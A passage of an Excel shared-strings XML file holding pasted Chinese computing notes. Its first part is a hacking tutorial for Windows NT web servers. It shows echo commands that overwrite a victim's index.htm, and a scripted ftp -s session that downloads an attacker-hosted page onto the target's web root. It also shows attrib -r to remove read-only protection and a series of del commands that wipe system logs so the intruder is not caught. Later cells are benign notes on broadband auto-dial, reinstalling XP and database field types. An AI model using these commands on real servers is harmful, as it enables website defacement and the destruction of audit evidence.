        <charset val="134"/>
      </rPr>
      <t>，有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>种方法，大家看看有什么区别。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">echo </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>南京大屠杀铁证如山，任何日本人不得抵赖！</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>&gt;index.htm</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">echo </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>南京大屠杀铁证如山，任何日本人不得抵赖！</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>&gt;&gt;index.htm</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一个的意思是覆盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>里面。</t>
    </r>
  </si>
  <si>
    <r>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>&gt;&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”产生的内容将追加进文件中，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”则将原文件内容覆盖。</t>
    </r>
  </si>
  <si>
    <t>大家可以本地试下。</t>
  </si>
  <si>
    <t>可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。</t>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、首先，我们需要申请一个免费的主页空间。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>echo</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在可写目录下建立如下内容的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件：（以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>chinren</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器为例。）</t>
    </r>
  </si>
  <si>
    <r>
      <t>open upload.chinaren.com</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（你的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，申请时你的空间提供商会给你的）</t>
    </r>
  </si>
  <si>
    <r>
      <t>cnhack</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（你申请时的用户名）</t>
    </r>
  </si>
  <si>
    <r>
      <t>test</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（你申请时的密码）</t>
    </r>
  </si>
  <si>
    <r>
      <t>get index.htm c:\\inetpub\\wwwroot\\index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（这里是把你空间上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下载到对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>c:\\inetpub\\wwwroot\\index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <t>bye</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（退出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对话，相当在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>EXIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>退出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <t>具体的做法：</t>
  </si>
  <si>
    <r>
      <t>输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> echo open upload.chinaren.com&gt; c:\\cnhack.txt</t>
    </r>
  </si>
  <si>
    <r>
      <t>输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> echo cnhack &gt;&gt; c:\\cnhack.txt</t>
    </r>
  </si>
  <si>
    <r>
      <t>输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> echo 39abs &gt;&gt; c:\\cnhack.txt</t>
    </r>
  </si>
  <si>
    <r>
      <t>输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> echo get index.htm c:\\inetpub\\wwwroot\\index.htm+&gt;&gt;+c:\\cnhack.txt</t>
    </r>
  </si>
  <si>
    <r>
      <t>最后输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ftp -s:c:\\cnhack.txt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（利用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ftp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-s</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数，执行文件里的内容。）</t>
    </r>
  </si>
  <si>
    <t>等命令完成时，文件已经下载到你指定的文件里了。</t>
  </si>
  <si>
    <r>
      <t>注意：取得文件后，请删除</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cnhack.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。（如果不删除，很容易会给别人看到你的密码。）</t>
    </r>
  </si>
  <si>
    <r>
      <t>记得要</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> del c:\\cnhack.txt</t>
    </r>
  </si>
  <si>
    <t>11:attrib</t>
  </si>
  <si>
    <t>这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。</t>
  </si>
  <si>
    <t>attrib -r index.htm</t>
  </si>
  <si>
    <r>
      <t>这个命令是把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的只读属性去掉。</t>
    </r>
  </si>
  <si>
    <r>
      <t>如果把“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”改为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”则是把这个文件的属性设置为只读</t>
    </r>
  </si>
  <si>
    <t>attrib +r index.htm</t>
  </si>
  <si>
    <r>
      <t>这个命令是把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的属性设置为只读。</t>
    </r>
  </si>
  <si>
    <t>12:del</t>
  </si>
  <si>
    <r>
      <t>当你看到这个标题可别倒下啊！现在要离开</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>127.0.0.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。</t>
    </r>
  </si>
  <si>
    <r>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的日志有这些</t>
    </r>
  </si>
  <si>
    <t>del C:\\winnt\\system32\\logfiles\\*.*</t>
  </si>
  <si>
    <t>del C:\\winnt\\ssytem32\\config\\*.evt</t>
  </si>
  <si>
    <t>del C:\\winnt\\system32\\dtclog\\*.*</t>
  </si>
  <si>
    <t>del C:\\winnt\\system32\\*.log</t>
  </si>
  <si>
    <t>del C:\\winnt\\system32\\*.txt</t>
  </si>
  <si>
    <t>del C:\\winnt\\*.txt</t>
  </si>
  <si>
    <t>del C:\\winnt\\*.log</t>
  </si>
  <si>
    <t>word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手机里暗藏的十大秘密</t>
  </si>
  <si>
    <t>数码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第二：在右侧的”操作”窗格中单击”创建基本任务”选项．打开输入名称和描述（比如：开机自动连接宽带）．</t>
  </si>
  <si>
    <t>第七：单击确定．</t>
  </si>
  <si>
    <t xml:space="preserve">以后登陆后，系统就会在5秒后自动连接了！ </t>
  </si>
  <si>
    <t>windows7 宽带自动连接</t>
  </si>
  <si>
    <t>windows7 宽带自动连接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一：在开始菜单的搜索框中输入</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>任务计划程序</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>(task schedule)命令，然后打开！</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第八：打开宽带连接属性对话框，切换到</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项，取消</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提示名称</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码和证书等（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>P)”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复选框．</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第九：打开</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IE,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>----Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-----</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-----</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>始终保持默认连接</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c:\\windows\\system32\\rasphone.exe是拨号程序的路径。</t>
  </si>
  <si>
    <t>-d是指进行宽带连接，最后的“宽带连接”是要自动拨号的宽带连接名。</t>
  </si>
  <si>
    <t>有很多软件可以开机自动拨号  </t>
  </si>
  <si>
    <r>
      <t>必要条件：系统保存了宽带连接的用户名和密码</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FFFF00FF"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>格式化后装系统的步骤</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>   </t>
    </r>
  </si>
  <si>
    <r>
      <t>step 1.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 准备好所有需要用的光盘或者文件。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 2.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 在bios中把启动顺序改成光盘优先。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 3.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 光盘放入电脑，开机，出现提示说若要从光盘启动，按任意键。就按任意键好了</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 5.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 如果不能上网，就手动设置一下。然后上网先更新病毒库。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 6.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 在线给xp打补丁。记住：没有补丁的xp是垃圾！</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 7.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 上网找显卡和声卡的驱动，看看有没有更新的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 8.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 给其他分区格式化，建议ntfs格式，因为这种格式的簇比较小，所以节省空间；另外一些病毒也无法感染：）。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 10.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 关掉休眠功能，因为占空间。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 11.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 关掉还原功能，因为有“一键GHOST”可以备份系统盘。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 12.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 删除不需要的输入法。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 15.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 将ie浏览器的临时文件夹存储位置改在d盘，方法是打开ie，在“选项”——“常规”里面改，需要重启。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 16.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 安装应用软件，统统安装到e盘。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 17.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 启动魔法兔子，优化系统。</t>
    </r>
  </si>
  <si>
    <r>
      <t>step 13.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 安装网络软件，如：maxthon浏览器\flashget\emule</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以下假设分了三个区，c, d, e。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (1)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>字符型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Character)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：由字母</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汉字</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、数字、空格等任意</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ASCII</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码字符组成。</t>
    </r>
  </si>
  <si>
    <r>
      <t>字符数据的长度为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>254</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，每个字符占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (2)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>货币型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Currency)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
